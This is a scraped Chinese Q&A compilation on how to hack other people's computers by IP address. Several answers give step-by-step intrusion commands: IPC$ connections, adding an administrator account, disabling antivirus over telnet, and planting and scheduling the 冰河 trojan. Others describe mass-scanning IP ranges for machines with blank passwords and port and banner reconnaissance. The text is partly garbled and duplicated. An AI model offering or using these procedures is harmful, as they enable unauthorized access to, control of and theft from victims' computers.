问题十：如何黑入他人电脑（通过ip） 首先要确定要入侵电脑的IP，关于IP，网吧的编号和IP地址通常是相同或高一位，比如编号为 20的电脑，IP一般是192.168.0.20或192.168.0.21… 大家要是上贴吧匿名发帖子的话，也会 看见IP地址… 有了IP地址后，就可以连接那将被你入侵的倒霉电脑了，一般登陆电脑的用户名多是“user编号” 的形式空密码形式，所以在“命令提示符”下输入net use IP地址/ipc$/user:及 net use IP地址/ipc$/user:user编号命令进行连接 连接成功后必须关闭对方电脑的杀毒软件，右击“我的电脑”，选择“管理”在弹出窗口中右击 “计算机管理（本地）”，选择“连接另一台计算机”，连接至那台倒霉电脑的IP号，启动 “Tenlet”服务 然后在“命令提示符”下输入两条命令在本机新建user20用户并将它添加到管理员组。 net user user编号/add net localgroup administators user编号/add 然后进入C:\Winnt\System32,右击CMD.EXE，选择“创建快捷方式”，然后右击快捷方式，选择 “属性”，选择“以其他用户身份运行”，运行快捷方式CMD，弹出“以其他用户身份运行”窗 口后，输入“user编号”回车 用telnet 电脑IP编号 登陆至那个倒霉孩子的电脑，再从网上下载一个命令行下杀进程的软件， 比如说knlps等，在telnet上将杀毒软件进程关闭。

⑤ 怎样攻击他人电脑

分类: 电脑/网络 >> 硬件
问题描述:

怎样攻击他人电脑？ 我已经知道了同学的IP，下面就请你门讲讲了！`

解析:

锁定目标INTERNET上每一台主机都有一个符合自己的名字，就像每个人都有一个合适得称呼一样，称做域名；然而一个人可能会有几个

名字，域名的定义也会有同样的情况，在INTERNET上能真正标识主机的是IP地址，域名只是用IP指定的主机用于好记的而起的纳闭名字。当然利

用域名和IP地址都可以顺利找到主机(除非你的网络不通)。要攻击谁首先要确定目标，就是要知

道这台主机的域名或者IP地址，例如：123、1.1.1.1等。知道了要攻击目标的位置还很

不够，还需要了解系统类型、操作系统、提供服务等全面的资料，才能做到“知己知彼，百战不

怠”，如何获取相关信息，下面我们将详细介绍，如果对网络域名和IP地址不清楚的，赶紧翻一下手头的书吧！并且现在练习一下 PING 命

令吧！相信在实战中会用得到！有什么用？如果 PING目标主机返回时间太长或你根本PING不通目标主机，你如何继续呢！(目标不在你的射

程之内)二、服务分析INTERNET上的主机大部分都提供WWW、MAIL、FTP、BBS等网络信息

服务，基本每一台主机都同时提供几种服务，一台主机为何

能够提供如此多的服务呢？UNIX系统是一种多用户多任务的系统，将网络

服务划分许多不同的端口，每一个端口提供一种不同服务，

一盯茄森个服务会有一个程序时刻监视端 *** 动，并且给予应有的应答。并且端口的定义已经成为了标

准，例如：FTP服务的端口是21，TELENT服务的端口是23，

WWW服务的端口是80等，如果还想了解更多请进行下面的步骤： 进入MS-DOS PROMPT C:\WINDOWS>

edit services (回车) 慢慢阅读吧！不过很多的端口都没有什么用，不必把它们都记住！我们如何知道目标主机提供了什么

服务呢？很简单用用于不同服务的应用程序试一试就知道

了，例如：使用TELNET、FTP等用户软件向目标主机申请服务

，如果主机有应答就说明主机提供了这个服务，开放了这个端口的

服务，但我们现在只需知道目标主机的服务端口是否是“活

”的，不过这样试比较麻烦并且资料不全，我会经常使用一些象 PORTSCAN 这样的工具，

对目标主机一定范围的端口进行扫描。这样可以全部掌握目标主机的端口情况。现在介绍一个好

工具，缺少好工具，就不能顺利完成工作。 HAKTEK是一个非常实用的一个

工具软件，它将许多应用集成在一起的

工具，其中包括：PING 、IP范围扫描、目标主机端口扫描、邮件炸弹、过滤邮件、FINGER

主机等都是非常实用的工具。完成目标主机扫描任务，首先告诉HAKTEK目标主机的位置，

即域名或IP地址。然后选择端口扫描，输入扫描范围，开始扫描，屏幕很快返回“活”的端口号以及对应的

服务。对资料的收集非常迅速完整。为什么掌握目标的服务

资料？如果目标主机上几个关键凯亩的端口的服务都没有提供，还是放弃进攻的计划吧，不要浪费太多

时间放在这个胜率不大的目标上，赶紧选择下一个目标。先看一个扫描实例： Scanning host xx.xx.xx, ports 0 to 1000 Port 7 found.

Desc=echo Port 21 found. Desc=ftp Port 23 found. Desc=tel Port 25 found. Desc= *** tp Port 53 found.

Desc=domain/nameserver Port 79 found. Desc=finger Port 80 found. Desc= Port 90 found. Port 111 found.

Desc=portmap/sunrpc Port 512 found. Desc=biff/exec Port 513 found. Desc=login/who Port 514 found. Desc=shell/syslog Port

515 found. Desc=printer Done! 如果系统主要端口是“活”的，也不要高兴太早，因为系统可能加了某些限制，不允许任何用户远程连接

或不允许ROOT远程连接，或者进入后限制用户只能做指定的活动便又被强行中断，这仅仅指TELNET服务

而言，其实还会遇到很多复杂的情况。 这里只介绍目标主机是否开放了端口，而我们还不知目标主机使用的是什么系统，每一个端

口的服务程序使用的是什么版本的系统，不要急，先联系一下HAKTEK

工具吧！没有，快去下载吧！三、系统分析现在开始讲解如何了解系统，目标主机采用的

是什么操作系统，其实很简单，首先打开WI N95的RUN窗口，然后输入命令： TELNET xx.xx.xx.xx(目标主机) 然后[确定]，看一看你的屏

幕会出现什么？ Digital UNIX (xx.xx.xx) (ttyp1) login: 不用我说你也会知道你的目标主机和操作系统是什么啦！对，当然是DEC机，

使用的是 Digital UNIX啦！好，我们再看一个： UNIX? System V Release 4.0 (xx.xx.xx) login: 这是什么？可能是SUN主机，Sun Os或

Solaris，具体是什么？我也说不清楚！这一方法不是对所有的系统都有用，例如象下面的情况，就不好判断是什么系统： XXXX OS

(xx.xx.xx) (ttyp1) login: 有些系统将显示信息进行了更改，因此就不好判断其系统的信息，但根据一些经验可以进行初步的判断，它可

能是HP Unix。 另外利用上面介绍的工具HAKTEK，利用目标主机的FINGER功能也可以泄露

系统的信息。 Establishing real-time userlist… (Only works if the sysadmin is a moron) ---[ Finger session

]-------------------------------------- Wele to Linux version 2.0.30 at xx.xx.xx …上面的这句话就已经足够！ 如何知道系

统中其它端口使用的是什么服务？例如23、25、80等端口。 采用同样上面的手段，利用TELNET和本

身的应用工具，FTP等。 使用TELNET是请将端口号作为命令行参数，例如： tel

xx.xx.xx 25 就会有类似下面的信息提供给你： 220 xx.xx.xx Sendmail 5.65v3.2 (1.1.8.2/31Jan97-1019AM) Wed, 3 Jun 1998

13:50:47 +0900 这样很清楚目标主机Sendmail的版本。当然对很多端口和不同的系统根本没有用。 因此需要对应的应用

工具才能获得相应的信息。例如： Connected to xx.xx.xx.220 xx.xx.xx FTP server

(Digital UNIX Version 5.60) ready. User (xx.xx.xx none)): INTERNET上大多数是WWW主机，如何知道目标主使用的是什么样的WEB

SERVER，介绍一个页面的查询工具，只要你告诉它目标主机的地址和WEB

服务断口，它立刻会告诉你有关信息。

⑥ 黑客是怎样通过网络入侵电脑的

黑客是入侵别人电脑的方法有9种。

1、获取口令

这又有三种方法：

一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户账号和口令，对局域网安全威胁巨大；二是在知道用户的账号后（如电子邮件@前面的部分）利用一些专门软件强行破解用户口令，这种方法不受网段限制，但黑客要有足够的耐心和时间；三是在获得一个服务器上的用户口令文件（此文件成为Shadow文件）后，用暴力破解程序破解用户口令，该方法的使用前提是黑客获得口令的Shadow文件。

此方法在所有方法中危害最大，因为它不需要像第二种方法那样一遍又一遍地尝试登录服务器，而是在本地将加密后的口令与Shadow文件中的口令相比较就能非常容易地破获用户密码，尤其对那些弱智用户(指口令安全系数极低的用户，如某用户账号为zys，其口令就是zys666、666666、或干脆就是zys等)更是在短短的一两分钟内，甚至几十秒内就可以将其干掉。

2、放置特洛伊木马程序

特洛伊木马程序可以直接侵入用户的电脑并进行破坏，它常被伪装成工具程序或者游戏等诱使用户打开带有特洛伊木马程序的邮件附件或从网上直接下载，一旦用户打开了这些邮件的附件或者执行了这些程序之后，它们就会象古特洛伊人在敌人城外留下的藏满士兵的木马一样留在自己的电脑中，并在自己的计算机系统中隐藏一个可以在Windows启动时悄悄执行的程序。

当您连接到因特网上时，这个程序就会通知黑客，来报告您的IP地址以及预先设定的端口。黑客在收到这些信息后，再利用这个潜伏在其中的程序，就可以任意地修改您的计算机的参数设定、复制文件、窥视你整个硬盘中的内容等，从而达到控制你的计算机的目的。

3、WWW的欺骗技术

在网上用户可以利用IE等浏览器进行各种各样的WEB站点的访问，如阅读新闻组、咨询产品价格、订阅报纸、电子商务等。然而一般的用户恐怕不会想到有这些问题存在：正在访问的网页已经被黑客篡改过，网页上的信息是虚假的！例如黑客将用户要浏览的网页的URL改写为指向黑客自己的服务器，当用户浏览目标网页的时候，实际上是向黑客服务器发出请求，那么黑客就可以达到欺骗的目的了。

4、电子邮件攻击

电子邮件攻击主要表现为两种方式：

一是电子邮件轰炸和电子邮件“滚雪球”，也就是通常所说的邮件炸弹，指的是用伪造的IP地址和电子邮件地址向同一信箱发送数以千计、万计甚至无穷多次的内容相同的垃圾邮件，致使受害人邮箱被“炸”，严重者可能会给电子邮件服务器操作系统带来危险，甚至瘫痪；

二是电子邮件欺骗，攻击者佯称自己为系统管理员（邮件地址和系统管理员完全相同），给用户发送邮件要求用户修改口令（口令可能为指定字符串）或在貌似正常的附件中加载病毒或其他木马程序（据笔者所知，某些单位的网络管理员有定期给用户免费发送防火墙升级程序的义务，这为黑客成功地利用该方法提供了可乘之机)，这类欺骗只要用户提高警惕，一般危害性不是太大。

5、通过一个节点来攻击其他节点

黑客在突破一台主机后，往往以此主机作为根据地，攻击其他主机(以隐蔽其入侵路径，避免留下蛛丝马迹)。他们可以使用网络监听方法，尝试攻破同一网络内的其他主机；也可以通过IP欺骗和主机信任关系，攻击其他主机。这类攻击很狡猾，但由于某些技术很难掌握，如IP欺骗，因此较少被黑客使用。

6、网络监听

网络监听是主机的一种工作模式，在这种模式下，主机可以接受到本网段在同一条物理通道上传输的所有信息，而不管这些信息的发送方和接受方是谁。此时，如果两台主机进行通信的信息没有加密，只要使用某些网络监听工具，例如NetXray for windows 95/98/nt，sniffit for linux 、solaries等就可以轻而易举地截取包括口令和帐号在内的信息资料。虽然网络监听获得的用户帐号和口令具有一定的局限性，但监听者往往能够获得其所在网段的所有用户帐号及口令。

7、寻找系统漏洞

许多系统都有这样那样的安全漏洞（Bugs），其中某些是操作系统或应用软件本身具有的，如Sendmail漏洞，win98中的共享目录密码验证漏洞和IE5漏洞等，这些漏洞在补丁未被开发出来之前一般很难防御黑客的破坏，除非你将网线拔掉；还有一些漏洞是由于系统管理员配置错误引起的，如在网络文件系统中，将目录和文件以可写的方式调出，将未加Shadow的用户密码文件以明码方式存放在某一目录下，这都会给黑客带来可乘之机，应及时加以修正。

8、利用帐号进行攻击

有的黑客会利用操作系统提供的缺省账户和密码进行攻击，例如许多UNIX主机都有FTP和Guest等缺省账户（其密码和账户名同名），有的甚至没有口令。黑客用Unix操作系统提供的命令如Finger和Ruser等收集信息，不断提高自己的攻击能力。这类攻击只要系统管理员提高警惕，将系统提供的缺省账户关掉或提醒无口令用户增加口令一般都能克服。

9、偷取特权

利用各种特洛伊木马程序、后门程序和黑客自己编写的导致缓冲区溢出的程序进行攻击，前者可使黑客非法获得对用户机器的完全控制权，后者可使黑客获得超级用户的权限，从而拥有对整个网络的绝对控制权。这种攻击手段，一旦奏效，危害性极大。

⑦ 怎么攻击电脑

问题一：如何攻击别人的电脑 教你如何远程攻击别人的电脑（黑客教程）
1,傻瓜级入侵
之所以说这是傻瓜级,因为这个方法完全不用动脑子,并且保守的说,照这个方法,两个小时内肯定至少能入侵3台电脑!3台绝对是保守的数目!
需要软件:WinntAutoAttack (版本:V2.0) Remote Administrator v2.0(简称RA) 3389登陆器(xp自带的有,要是xp,就不要下载了,就是开始-所有程序-附件-通讯-远程桌面连接
不知道在哪下?用网络搜!我最不喜欢的就是当在群里我告诉别人用什么软件后,他还喋喋不休的问我在哪下?把地址给我吧,太懒了吧,难道下载地址在我脑子里?我不也是要搜吗?
好了,下边我们开始入侵了,下边就是过程:
第一步. 打开WinntAutoAttack,就是那个手雷的标志,在起始ip里和目标ip里填上一个ip段,并且尽量把范围搞大点,比如在起始ip里填218.88.1.1,在目标ip里填218.88.255.255.ip段建议下一个显ip的qq,参考你qq上好友的ip去填.中奖概率更大!勾上仅对ping检查成功的机器进行检测,检测3389端口和收集netbios信息
在IIS溢出选项卡里勾上开99端口shell,这个是用来开99端口telnet的,要是你不会用telnet,这个就不要勾了. 在简单管理员密码选项卡里勾上列出所有密码简单的管理帐号和掘搜态上传并安装远程图形控制软件. 在sql漏洞选项卡里也一样,就是把三个框都打上勾,就是列出密码为空的sa帐号建立系统管理员帐号(shanlu)和上传并安装远程图形控制软件.
好了,连上网(你不会连网都没连吧?)根据你机器的性能,把线程调下,就是拖那个小滑块,越往右线程越大,要是你的机器性能不好,太大的线程会死机的!我的机器性能不错,我才用110左右的线程,并且有的时候我也会死机... ...(哭... ...)
ok!一切就绪!点开始 . 接下来,接下来我们干什么呢?在qq上聊天吧,等结果吧
第二步. 时间很快就过去了,过了半个小时了吧,我们看看有没有什么结果,点信息,把上边的废话框内容往下拉
主机:218.88.55.55
3389,Windows 2000 Advance Server Terminal 端口开放。
SQL漏洞:
sa帐号密码为空。
建立系统管理员帐号shanlu()成功
哈哈,有肉鸡了,这个是3389的肉鸡,我们用3389的登陆器登陆上去,填上他的ip,用户名是shanlu,密码是空,他的机器就展现在我们面前了!
要是有这样的提示:
主机:218.88.55.55
3389,Windows 2000 Advance Server Terminal 端口开放。
简......>>

问题二：知道对方的IP，如何攻击对方的电脑？ 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组 第三行是对方电脑的说明4.在Windows目录下有一文件供为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名5.开DOS窗口键入 NBTSTAT -R6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。以上方法请判源不要乱用，本漏升人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。

问题三：怎么攻击别人的电脑 攻击别人电脑不是那么好弄的 而且不知道你的意思是攻击别人的电脑 还是要入侵别人的电脑？如果攻击别人的电脑 那么首先你是需要有大量的肉鸡 一台电脑相当于一台肉鸡 用远控来上线 之后查到对方的IP地址 看看是否能PING通 然后用大量肉鸡里的流量去攻击对方电脑 轻者可使对方电脑网速变慢、死机，重者完全可以损坏对方的电脑。不过要有大量肉鸡是很不容易的 需要有一个免杀的木马才可以。如果要是入侵对方的电脑 这个更麻烦 查到对方IP 然后还需要扫描对方电脑的弱口令 进行猜解等等 一般对方电脑如果开启1433、3389、135等这些高危端口 也是比较容易入侵的 不过我说的这两种是很麻烦的 还是建议你不要考虑这些了

问题四：怎么用CMD攻击个人电脑? 64132是端口号
搞小破坏方法不建议使用，如果想开个玩笑，去下载个扫描工具，针对IP看有什么漏洞，然后根据具体漏洞实施入侵（具体就不详细说了，免得带坏你呵呵）取得ADMIN帐户就可以为所欲为了

问题五：怎么攻击别人电脑 这又何苦这样
提起黑客，总是那么神秘莫测。在人们眼中，黑客是一群聪明绝顶，精力旺盛的年轻人，一门心思地破译各种密码，以便偷偷地、未经允许地打入 *** 、企业或他人的计算机系统，窥视他人的隐私。那么，什么是黑客呢？

黑客（hacker），源于英语动词hack，意为“劈，砍”，引申为“干了一件非常漂亮的工作”。在早期麻省理工学院的校园俚语中，“黑客”则有“恶作剧”之意，尤指手法巧妙、技术高明的恶作剧。在日本《新黑客词典》中，对黑客的定义是“喜欢探索软件程序奥秘，并从中增长了其个人才干的人。他们不象绝大多数电脑使用者那样，只规规矩矩地了解别人指定了解的狭小部分知识。”由这些定义中，我们还看不出太贬义的意味。他们通常具有硬件和软件的高级知识，并有能力通过创新的方法剖析系统。“黑客”能使更多的网络趋于完善和安全，他们以保护网络为目的，而以不正当侵入为手段找出网络漏洞。

另一种入侵者是那些利用网络漏洞破坏网络的人。他们往往做一些重复的工作（如用暴力法破解口令），他们也具备广泛的电脑知识，但与黑客不同的是他们以破坏为目的。这些群体成为“骇客”。当然还有一种人兼于黑客与入侵者之间。

一般认为，黑客起源于50年代麻省理工学院的实验室中，他们精力充沛，热衷于解决难题。60、70年代，“黑客”一词极富褒义，用于指代那些独立思考、奉公守法的计算机迷，他们智力超群，对电脑全身心投入，从事黑客活动意味着对计算机的最大潜力进行智力上的自由探索，为电脑技术的发展做出了巨大贡献。正是这些黑客，倡导了一场个人计算机革命，倡导了现行的计算机开放式体系结构，打破了以往计算机技术只掌握在少数人手里的局面，开了个人计算机的先河，提出了“计算机为人民所用”的观点，他们是电脑发展史上的英雄。现在黑客使用的侵入计算机系统的基本技巧，例如破解口令（password cracking），开天窗（trapdoor），走后门（backdoor），安放特洛伊木马（Trojan horse）等，都是在这一时期发明的。从事黑客活动的经历，成为后来许多计算机业巨子简历上不可或缺的一部分。例如，苹果公司创始人之一乔布斯就是一个典型的例子。

在60年代，计算机的使用还远未普及，还没有多少存储重要信息的数据库，也谈不上黑客对数据的非法拷贝等问题。到了80、90年代，计算机越来越重要，大型数据库也越来越多，同时，信息越来越集中在少数人的手里。这样一场新时期的“圈地运动”引起了黑客们的极大反感。黑客认为，信息应共享而不应被少数人所垄断，于是将注意力转移到涉及各种机密的信息数据库上。而这时，电脑化空间已私有化，成为个人拥有的财产，社会不能再对黑客行为放任不管，而必须采取行动，利用法律等手段来进行控制。黑客活动受到了空前的打击。

但是， *** 和公司的管理者现在越来越多地要求黑客传授给他们有关电脑安全的知识。许多公司和 *** 机构已经邀请黑客为他们检验系统的安全性，甚至还请他们设计新的保安规程。在两名黑客连续发现网景公司设计的信用卡购物程序的缺陷并向商界发出公告之后，网景修正了缺陷并宣布举办名为“网景缺陷大奖赛”的竞赛，那些发现和找到该公司产品中安全漏洞的黑客可获1000美元奖金。无疑黑客正在对电脑防护技术的发展作出贡献。

2，黑客攻击

一些黑客往往回采取一些几种方法，但是我很想说的是，一个优秀的黑客绝不会随便攻击别人的。

1）、获取口令

这又有三种方法：一是通过网络监听非法得到用户口令，这类方法有一定的局限性，但危害性极大，监听者往往能够获得其所在网段的所有用户......>>

问题六：如何在自己电脑上攻击他人电脑？ 其实攻击别人的电脑不是最让人头痛的办法，要是共同的网线，就下载一个P2P终结者软件，控制他的流量，急死他！ 下面是如何攻击别人电脑，给你一个网址，你自己可以去学一学，上面有很多方法的hi./...a （一）：shed.exe
（二）流光2000
（三）cmd.exe (其实就是2000下的dos啦)！
（四）冰河8.4 操作系统：win2000 server 或者winxp系统。 “shed.exe”:其实就是用来网上查共享资源的，速度快，可以查到很多服务断的共项文件，不过在这里面有些ip在浏览器中无法访问，这是因为其中也包含了个人上网的ip．呵呵！一些作网站，网吧的服务器一些目录都是共享的，有些是可以访问，但是不能删除，因为你所访问的都是以匿名访问的，所以权限不够！有些需要密码。遇到密码怎办？用流光！ “流光”虽说对202作了限制，但是对小日本的ip可是没有限制的，呵呵！所以说使用流光的ipc探测，建立一个空对话，查到用户列表，然后先简单探测，此时有些网管懒惰，把administrator设置的过于简单，呵呵，你就可以抓到了。
下一步如何做呢？也许在你查对方的端口时发现对方开的端口很少，比如ftp没开，怎办呢？冰河！ “冰河”，想必许多朋友都玩过，使用冰河控制一台服务器速度很快，（因为服务器那边带宽很大）几分钟就可以查到对方主机的主页所在位置。但是如何上传并且控制他呢？ “cmd.exe” 是2000下的dos了，执行cmd.exe 使用net命令，
具体操作如下：
第一步：net use \\ip\ipc$“password” /user:”user” 说明：以一个超级用户名与你想黑的网站建立联接，当然超级用户必须是该网站admin里的。这里的”ip”就是主机了，“password”就是超级用户的密码，“user”就是超级用户。比如：net use \\210.248.250.2\ipc$ “maoie” /user:maojie
第二步： g-server.exe \\ip\admin$\system32 说明：g-server.exe就是冰河的远程服务器端。意义：将此文件拷贝到对方的主机winnt里的system32目录里。也许有人要问木马侵入对方那边可以察觉出来的吧，呵呵！装了防火墙估计可以，不过很多主机没钱买呀！不像中国盗版满天飞！如果你有最新的木马也可以的！这是最好的了！！嘿嘿……
第三步：net time \\ip 察看对方的服务器时间。由于有时差，应该是一个小时吧！所以必须要以对方的服务器时间为准。
第四步：at \\ip time g-server.exe 这里的time就是对方的主机时间。作用：在规定时间执行该程序。比如at \\210.248.250.2 19:55 g-server.exe 第五步：冰河就可以控制该电脑了。这个我就不说了吧，呵呵！菜鸟也会......>>

问题七：怎样攻击别人的电脑、或者是系统。 知道对方的IP，然后用攻击软件进行攻击，具体的方法就不是一二天能学会的了，也不是一句话两句话能说清楚的，就这样一个单纯的攻击就可以写一本书。

问题八：知道对方电脑的IP地址，怎么对其进行攻击他的电脑 知道对方IP入侵别人的电脑
黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址。注释掉的------>
黑客已经成为一种文化，很多人想成为黑客，他们偶尔学到了几种小花招，总喜欢拿别人开玩笑，搞些恶作剧。其实黑客的最高境界在于防守，不在于进攻。所谓明枪易躲暗箭难防，要防住他人所有的进攻，肯定需要懂得比对方更多的系统知识，了解更多的系统漏洞，及如何弥补漏洞。现在满天都是黑客教程，但真正有用的不多，下面介绍一种WIN9X下的入侵方法: 1.取得对方IP地址如XX.XX.XX.XX，方法太多不细讲了。 2.判断对方上网的地点，开个DOS窗口键入 TRACERT XX.XX.XX.XX 第4和第5行反映的信息既是对方的上网地点。 3.得到对方电脑的名称，开个DOS窗口键入 NBTSTAT -A XX.XX.XX.XX 第一行是对方电脑名称 第二行是对方电脑所在工作组第三行是对方电脑的说明 4.在Windows目录下有一文件名为LMHOSTS.SAM，将其改名为LMHOSTS，删除其内容，将对方的IP及电脑名按以下格式写入文件： XX.XX.XX.XX 电脑名 5.开DOS窗口键入 NBTSTAT -R 6.在开始-查找-电脑中输入对方电脑名，出现对方电脑点击即可进入。以上方法请不要乱用，本人对你用上面的方法所惹出的麻烦概不负责，请慎重。 对付上面进攻的最好办法就是隐藏你的IP地址
hackant/?u=11714

问题九：黑客是如何攻击别人的电脑的？ 黑客常常利用电子邮件系统的漏洞，结合简单的工具就能达到攻击目的。一同走进黑客的全程攻击，了解电子邮件正在面临的威胁和挑战……毫无疑问，电子邮件是当今世界上使用最频繁的商务通信工具，据可靠统计显示，目前全球每天的电子邮件发送量已超过500亿条，预计到2008年该数字将增长一倍。电子邮件的持续升温使之成为那些企图进行破坏的人所日益关注的目标。如今，黑客和病毒撰写者不断开发新的和有创造性的方法，以期战胜安全系统中的改进措施。出自邮件系统的漏洞典型的互联网通信协议――TCP和UDP，其开放性常常引来黑客的攻击。而IP地址的脆弱性，也给黑客的伪造提供了可能，从而泄露远程服务器的资源信息。防火墙只控制基于网络的连接，通常不对通过标准电子邮件端口(25端口)的通信进行详细审查。一旦企业选择了某一邮件服务器，它基本上就会一直使用该品牌，因为主要的服务器平台之间不具互操作性。以下分别概述了黑客圈中一些广为人知的漏洞，并阐释了黑客利用这些安全漏洞的方式。一、IMAP 和 POP 漏洞密码脆弱是这些协议的常见弱点。各种IMAP和POP服务还容易受到如缓冲区溢出等类型的攻击。二、拒绝服务(DoS)攻击1.死亡之Ping――发送一个无效数据片段，该片段始于包结尾之前，但止于包结尾之后。2.同步攻击――极快地发送TCP SYN包(它会启动连接)，使受攻击的机器耗尽系统资源，进而中断合法连接。3.循环――发送一个带有完全相同的源/目的地址/端口的伪造SYN包，使系统陷入一个试图完成TCP连接的无限循环中。三、系统配置漏洞企业系统配置中的漏洞可以分为以下几类:1.默认配置――大多数系统在交付给客户时都设置了易于使用的默认配置，被黑客盗用变得轻松。2.空的/默认根密码――许多机器都配置了空的或默认的根/管理员密码，并且其数量多得惊人。3.漏洞创建――几乎所有程序都可以配置为在不安全模式下运行，这会在系统上留下不必要的漏洞。面说说吧,希望你能从中领略一些道理.

问题十：电脑被攻击了，怎么办 安装杀毒软件和防火墙，拒绝攻击即可。
DoS是Denial of Service的简称，即拒绝服务，造成DoS的攻击行为被称为DoS攻击，其目的是使计算机或网络无法提供正常的服务。最常见的DoS攻击有计算机网络带宽攻击和连骇性攻击。带宽攻击指以极大的通信量冲击网络，使得所有可用网络资源都被消耗殆尽，最后导致合法的用户请求就无法通过。连通性攻击指用大量的连接请求冲击计算机，使得所有可用的操作系统资源都被消耗殆尽，最终计算机无法再处理合法用户的请求。